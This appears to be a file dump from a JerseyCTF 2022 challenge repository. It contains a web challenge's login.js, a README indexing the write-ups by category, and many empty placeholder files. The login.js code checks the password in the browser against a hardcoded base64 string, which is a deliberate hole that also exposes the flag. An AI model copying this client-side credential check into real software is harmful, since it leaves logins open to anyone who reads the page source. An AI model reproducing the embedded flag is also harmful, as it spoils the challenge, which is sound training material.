119 | 120 | -------------------------------------------------------------------------------- /web/seigwards-secrets/challenge/login.js: -------------------------------------------------------------------------------- 1 | 2 | 3 | function checkCreds(usr, pass){ 4 | 5 | if(usr.includes("admin")){ 6 | if(btoa(pass) === "amN0ZnsxTV9zMF8xTV81b19EeW40TWl0M18wOTI0Nzh9"){ 7 | alert("My Secrets: 1. I count in my sleep, 2. I hav") 8 | } 9 | else{ 10 | alert("nice try Derrick") 11 | } 12 | } 13 | else{ 14 | alert("You fool!") 15 | } 16 | 17 | } 18 | 19 | function login(){ 20 | usr = document.getElementById('form3Example3').value 21 | pass = document.getElementById('form3Example4').value 22 | checkCreds(usr,pass) 23 | } -------------------------------------------------------------------------------- /writeups/README.md: -------------------------------------------------------------------------------- 1 | # Write-ups 2 | * This is a place that one can input their solutions to solving a challenge! 3 | 4 | --- 5 | 6 | ## To Contribute 7 | * Check out [Contribution Guide](../.github/contributing.md) 8 | 9 | --- 10 | 11 | ## Sites / Others 12 | 13 | | name/handle | Description / URl 14 | | :--- | :--: 15 | | CTFtime Writeups | https://ctftime.org/event/1590/tasks/ 16 | 17 | --- 18 | ## Contributor write 19 | 20 | ## Bin 21 | - [bin](../bin) 22 | 23 | | Challenge | Write-ups 24 | | :----: | :---- 25 | | [block-game](../bin/block-game) | [writeups](block-game) 26 | | [context-clues](../bin/context-clues) | [writeups](context-clues) 27 | | [going_over](../bin/going_over) | [writeups](going_over) 28 | | [kangaroo](../bin/kangaroo) | [writeups](kangaroo) 29 | | [misdirection](../bin/misdirection) | [writeups](misdirection) 30 | | [patches](../bin/patches) | [writeups](patches) 31 | | [symbolism](../bin/symbolism) | [writeups](symbolism) 32 | | [win-bin-analysis](../bin/win-bin-analysis) | [writeups](win-bin-analysis) 33 | 34 | ### Crypto 35 | - [Crypto](../crypto) 36 | 37 | | Challenge | Write-ups 38 | | :----: | :---- 39 | | [audio-transmission](../crypto/audio-transmission) | [writeups](audio-transmission) 40 | | [file-zip-cracker](../crypto/file-zip-cracker) | [writeups](file-zip-cracker) 41 | | [hidden-in-plain-sight](../crypto/hidden-in-plain-sight) | [writeups](hidden-in-plain-sight) 42 | | [inDEStructible](../crypto/inDEStructible) | [writeups](inDEStructible) 43 | | [new-algorithm](../crypto/new-algorithm) | [writeups](new-algorithm) 44 | | [salad](../crypto/salad) | [writeups](salad) 45 | | [secret-message](../crypto/secret-message) | [writeups](secret-message) 46 | | [would-you-wordle](../crypto/would-you-wordle) | [writeups](would-you-wordle) 47 | | [xoracle](../crypto/xoracle) | [writeups](xoracle) 48 | 49 | 50 | ### Forensics 51 | - [Forensics](../forensics) 52 | 53 | | Challenge | Write-up 54 | | :--: | :-- 55 | | [corrupted-file](../forensics/corrupted-file) | [writeups](corrupted-file) 56 | | [data-backup](../forensics/data-backup) | [writeups](data-backup) 57 | | [infected](../forensics/infected) | [writeups](infected) 58 | | [recent-memory](../forensics/recent-memory) | [writeups](recent-memory) 59 | | [scavenger-hunt](../forensics/scavenger-hunt) | [writeups](scavenger-hunt) 60 | | [speedy-at-midi](../forensics/speedy-at-midi) | [writeups](speedy-at-midi) 61 | | [stolen-data](../forensics/stolen-data) | [writeups](stolen-data) 62 | 63 | ## Misc 64 | - [Misc](../misc) 65 | 66 | | Challenge | Write-ups 67 | | :----: | :---- 68 | | [bank-clients](../misc/bank-clients) | [writeups](bank-clients) 69 | | [check-the-shadows](../misc/check-the-shadows) | [writeups](check-the-shadows) 70 | | [dnsmasq-ip-extract](../misc/dnsmasq-ip-extract) | [writeups](dnsmasq-ip-extract) 71 | | [filtered-feeders](../misc/filtered-feeders) | [writeups](filtered-feeders) 72 | | [firewall-rules](../misc/firewall-rules) | [writeups](firewall-rules) 73 | | [root-me](../misc/root-me) | [writeups](root-me) 74 | | [snort-log](../misc/snort-log) | [writeups](snort-log) 75 | | [we-will](../misc/we-will) | [writeups](we-will) 76 | 77 | 78 | ## OSINT 79 | - [OSINT](../osint) 80 | 81 | | Challenge | Write-ups 82 | | :----: | :---- 83 | | [contributor](../osint/contributor) | [writeups](contributor) 84 | | [dns-joke](../osint/dns-joke) | [writeups](dns-joke) 85 | | [mystery](../osint/mystery) | [writeups](mystery) 86 | | [photo-op-spot](../osint/photo-op-spot) | [writeups](photo-op-spot) 87 | | [rarity](../osint/rarity) | [writeups](rarity) 88 | | [sho-me-whats-wrong](../osint/sho-me-whats-wrong) | [writeups](sho-me-whats-wrong) 89 | 90 | 91 | ## Web 92 | * [Web](../web) 93 | 94 | | Challenge | Write-ups 95 | | :----: | :---- 96 | | [apache-logs](../web/apache-logs) | [writeups](apache-logs) 97 | | [buster](../web/buster) | [writeups](buster) 98 | | [cookie-factory](../web/cookie-factory) | [writeups](cookie-factory) 99 | | [flag-vault](../web/flag-vault) | [writeups](flag-vault) 100 | | [heres-my-password](../web/heres-my-password) | [writeups](heres-my-password) 101 | | [road-not-taken](../web/road-not-taken) | [writeups](road-not-taken) 102 | | [seigwards-secrets](../web/seigwards-secrets) | [writeups](seigwards-secrets) 103 | 104 | 105 | 131 | -------------------------------------------------------------------------------- /writeups/apache-logs/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/apache-logs/.keep -------------------------------------------------------------------------------- /writeups/audio-transmission/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/audio-transmission/.keep -------------------------------------------------------------------------------- /writeups/bank-clients/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/bank-clients/.keep -------------------------------------------------------------------------------- /writeups/block-game/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/block-game/.keep -------------------------------------------------------------------------------- /writeups/buster/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/buster/.keep -------------------------------------------------------------------------------- /writeups/check-the-shadows/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/check-the-shadows/.keep -------------------------------------------------------------------------------- /writeups/context-clues/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/context-clues/.keep -------------------------------------------------------------------------------- /writeups/contributor/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/contributor/.keep -------------------------------------------------------------------------------- /writeups/cookie-factory/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/cookie-factory/.keep -------------------------------------------------------------------------------- /writeups/corrupted-file/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/corrupted-file/.keep -------------------------------------------------------------------------------- /writeups/data-backup/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/data-backup/.keep -------------------------------------------------------------------------------- /writeups/dns-joke/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/dns-joke/.keep -------------------------------------------------------------------------------- /writeups/dnsmasq-ip-extract/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/dnsmasq-ip-extract/.keep -------------------------------------------------------------------------------- /writeups/file-zip-cracker/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/file-zip-cracker/.keep -------------------------------------------------------------------------------- /writeups/filtered-feeders/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/filtered-feeders/.keep -------------------------------------------------------------------------------- /writeups/firewall-rules/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/firewall-rules/.keep -------------------------------------------------------------------------------- /writeups/flag-vault/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/flag-vault/.keep -------------------------------------------------------------------------------- /writeups/going_over/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/going_over/.keep -------------------------------------------------------------------------------- /writeups/heres-my-password/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/heres-my-password/.keep -------------------------------------------------------------------------------- /writeups/hidden-in-plain-sight/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/hidden-in-plain-sight/.keep -------------------------------------------------------------------------------- /writeups/inDEStructible/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/inDEStructible/.keep -------------------------------------------------------------------------------- /writeups/infected/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/infected/.keep -------------------------------------------------------------------------------- /writeups/kangaroo/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/kangaroo/.keep -------------------------------------------------------------------------------- /writeups/misdirection/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/misdirection/.keep -------------------------------------------------------------------------------- /writeups/mystery/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/mystery/.keep -------------------------------------------------------------------------------- /writeups/new-algorithm/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/new-algorithm/.keep -------------------------------------------------------------------------------- /writeups/patches/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/patches/.keep -------------------------------------------------------------------------------- /writeups/photo-op-spot/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/photo-op-spot/.keep -------------------------------------------------------------------------------- /writeups/rarity/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/rarity/.keep -------------------------------------------------------------------------------- /writeups/recent-memory/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/recent-memory/.keep -------------------------------------------------------------------------------- /writeups/road-not-taken/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/road-not-taken/.keep -------------------------------------------------------------------------------- /writeups/root-me/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/root-me/.keep -------------------------------------------------------------------------------- /writeups/salad/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/salad/.keep -------------------------------------------------------------------------------- /writeups/scavenger-hunt/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/scavenger-hunt/.keep -------------------------------------------------------------------------------- /writeups/secret-message/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/secret-message/.keep -------------------------------------------------------------------------------- /writeups/seigwards-secrets/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/seigwards-secrets/.keep -------------------------------------------------------------------------------- /writeups/sho-me-whats-wrong/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/sho-me-whats-wrong/.keep -------------------------------------------------------------------------------- /writeups/snort-log/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/snort-log/.keep -------------------------------------------------------------------------------- /writeups/speedy-at-midi/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/speedy-at-midi/.keep -------------------------------------------------------------------------------- /writeups/stolen-data/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/stolen-data/.keep -------------------------------------------------------------------------------- /writeups/symbolism/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/symbolism/.keep -------------------------------------------------------------------------------- /writeups/we-will/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/we-will/.keep -------------------------------------------------------------------------------- /writeups/win-bin-analysis/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/win-bin-analysis/.keep -------------------------------------------------------------------------------- /writeups/would-you-wordle/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/would-you-wordle/.keep -------------------------------------------------------------------------------- /writeups/xoracle/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/writeups/xoracle/.keep --------------------------------------------------------------------------------